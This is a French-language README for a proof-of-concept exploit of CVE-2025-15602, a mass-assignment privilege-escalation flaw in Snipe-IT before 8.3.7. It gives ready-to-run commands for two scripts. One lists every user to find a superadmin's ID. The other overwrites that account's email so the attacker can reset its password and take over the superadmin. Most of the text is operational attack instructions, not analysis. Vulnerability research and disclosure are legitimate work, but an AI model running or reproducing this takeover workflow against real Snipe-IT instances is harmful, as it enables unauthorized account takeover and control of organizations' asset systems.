
Snipe-IT < 8.3.7 Vulnérabilité d'assignation massive menant à une escalade de privilèges
CVE-2025-15602-PoC est une preuve de concept de la vulnérabilité CVE-2025-15602 dans Snipe-IT. Un script pour lister tous les utilisateurs et un script pour prendre le contrôle d'un compte superadmin.
Un utilisateur a seulement le droit de modifier les utilisateurs, il peut en abuser pour lister et effectuer une prise de contrôle du superadmin.
N'oubliez pas de modifier BASE_URL dans le script pour qu'il corresponde à votre instance de Snipe-IT.
Liste tous les utilisateurs de l'instance, pour obtenir l'ID du superadmin que vous souhaitez prendre le contrôle.
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
N'oubliez pas de modifier BASE_URL dans le script pour qu'il corresponde à votre instance de Snipe-IT.
Prend le contrôle d'un compte superadmin via une affectation de masse (mass assignment)
IMPORTANT : vous devez d'abord obtenir les bonnes informations de list_users.py sinon cela ne fonctionnera pas. L'ID, le nom d'utilisateur et le prénom doivent être exactement les mêmes que ceux du compte cible.
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username your_user \
--attacker-password your_pass
Après cela, vous pouvez réinitialiser le mot de passe via l'e-mail que vous avez défini.
pip install requests beautifulsoup4